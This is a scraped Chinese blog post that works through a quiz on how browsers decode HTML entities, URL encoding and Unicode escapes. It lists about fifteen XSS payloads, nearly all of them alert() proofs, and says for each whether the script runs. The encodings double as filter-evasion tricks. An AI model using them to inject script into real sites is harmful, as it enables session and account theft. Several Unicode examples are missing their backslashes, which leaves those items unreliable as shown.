zoukankan      html  css  js  c++  java
  • XSS的一些payload

    1. <a href="%6a%61%76%61%73%63%72%69%70%74:%61%6c%65%72%74%28%31%29"></a>
    URL encoded "javascript:alert(1)"
    
    答:javascript不会执行。
    
    
    2. <a
    href="&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:%61
    %6c%65%72%74%28%32%29">
    Character entity encoded "javascript" and URL encoded "alert(2)"
    
    答:javascript将执行。
    
    
    3. <a href="javascript%3aalert(3)"></a>
    URL encoded ":"
    
    答:javascript不会执行。
    
    
    4. <div>&#60;img src=x onerror=alert(4)&#62;</div>
    Character entity encoded < and >
    
    答:javascript不会执行。
    
    
    5. <textarea>&#60;script&#62;alert(5)&#60;/script&#62;</textarea>
    Character entity encoded < and >
    
    答案: javascript不会执行, 字符实体不会被解码
    
    
    6. <textarea><script>alert(6)</script></textarea>
    
    答:javascript不会执行。
    
    
    Advanced
    7. <button onclick="confirm('7&#39;);">Button</button>
    Character entity encoded '
    
    答:javascript将执行。
    
    
    8. <button onclick="confirm('8u0027);">Button</button>
    Unicode escape sequence encoded '
    
    答:javascript不会执行。
    
    
    9. <script>&#97;&#108;&#101;&#114;&#116&#40;&#57;&#41;&#59</script>
    Character entity encoded alert(9);
    
    答:javascript不会执行。
    
    
    10. <script>u0061u006cu0065u0072u0074(10);</script>
    Unicode Escape sequence encoded alert
    
    答:javascript将执行。
    
    
    11. <script>u0061u006cu0065u0072u0074u0028u0031u0031u0029</script>
    Unicode Escape sequence encoded alert(11)
    
    答:javascript不会执行。
    
    
    12. <script>u0061u006cu0065u0072u0074(u0031u0032)</script>
    Unicode Escape sequence encoded alert and 12 
    
    答:javascript不会执行。
    
    
    13. <script>alert('13u0027)</script>
    Unicode escape sequence encoded '
    
    答:javascript不会执行。
    
    
    14. <script>alert('14u000a')</script>
    Unicode escape sequence encoded line feed.
    
    答:javascript将执行。
    
    
    Bonus
    16. <a
    	  href="&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x25;&#x35;&#x63;&#x25;&#x37;&#x35;&#x25;&#x33;&#x30;&#x25;&#x33;&#x30;&#x25;&#x33;&#x36;&#x25;&#x33;&#x31;&#x25;&#x35;&#x63;&#x25;&#x37;&#x35;&#x25;&#x33;&#x30;&#x25;&#x33;&#x30;&#x25;&#x33;&#x36;&#x25;&#x36;&#x33;&#x25;&#x35;&#x63;&#x25;&#x37;&#x35;&#x25;&#x33;&#x30;&#x25;&#x33;&#x30;&#x25;&#x33;&#x36;&#x25;&#x33;&#x35;&#x25;&#x35;&#x63;&#x25;&#x37;&#x35;&#x25;&#x33;&#x30;&#x25;&#x33;&#x30;&#x25;&#x33;&#x37;&#x25;&#x33;&#x32;&#x25;&#x35;&#x63;&#x25;&#x37;&#x35;&#x25;&#x33;&#x30;&#x25;&#x33;&#x30;&#x25;&#x33;&#x37;&#x25;&#x33;&#x34;&#x28;&#x31;&#x35;&#x29;"></a>
    
    答:javascript将执行。
    

    http://www.wjlshare.xyz/2019/08/10/深入理解浏览器解析机制和xss向量编码-文章总结/

  • 相关阅读:
    [LeetCode] 687. Longest Univalue Path
    [Daily Coding Problem] 1 (LeetCode 1). Find if two numbers in an array add up to k
    [Daily Coding Problem] 18 (LeetCode 239). Sliding Window Maximum
    [Daily Coding Problem 24] Implement locking in a binary tree.
    [LeetCode] 208(LintCode). Implement Trie(Prefix Tree)
    [Daily Coding Problem] 16. Last N order ids implementation
    队伍总结 2017年5月14日
    ECNU 3260 袋鼠妈妈找孩子(dfs)
    ECNU 3263 丽娃河的狼人传说 (贪心)
    UVA 213 信息解码(二进制&位运算)
  • 原文地址:https://www.cnblogs.com/lovesickness/p/13491020.html
Copyright © 2011-2022 走看看